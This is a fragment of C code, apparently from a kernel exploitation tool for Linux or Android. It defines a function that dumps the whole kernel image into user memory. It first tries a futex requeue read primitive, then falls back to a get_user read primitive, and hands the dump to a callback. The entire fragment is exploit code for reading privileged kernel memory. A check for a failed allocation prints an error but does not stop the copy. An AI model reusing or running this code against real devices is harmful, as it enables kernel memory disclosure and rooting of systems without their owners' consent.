bool
attempt_memcpy_exploit(exploit_memory_callback_t callback_func, void *callback_param)
{
void *mem;
int i;
bool result;
printf("Try copying kernel memory... It will take a long time.\n");
mem = malloc(KERNEL_SIZE);
if (!mem) {
printf("malloc(): failed\n");
}
result = true;
printf("Attempt futex exploit...\n");
for (i = 0x00008000; i < KERNEL_SIZE; i += 4 * FUTEX_REQUEUE_MAX_REQUEST_COUNT) {
if (!futex_read_values_at_address(PAGE_OFFSET + i, mem + i, FUTEX_REQUEUE_MAX_REQUEST_COUNT)) {
result = false;
break;
}
}
if (!result) {
result = true;
printf("Attempt get_user exploit...\n");
for (i = 0x00008000; i < KERNEL_SIZE; i += 4) {
if (!get_user_read_value_at_address(PAGE_OFFSET + i, mem + i)) {
result = false;
break;
}
}
}
if (result) {
result = callback_func(mem, KERNEL_SIZE, callback_param);
}
free(mem);
return result;
}
bool
futex_read_value_at_address(unsigned long address, int *value)
{
return futex_read_values_at_address(address, value, 1);
}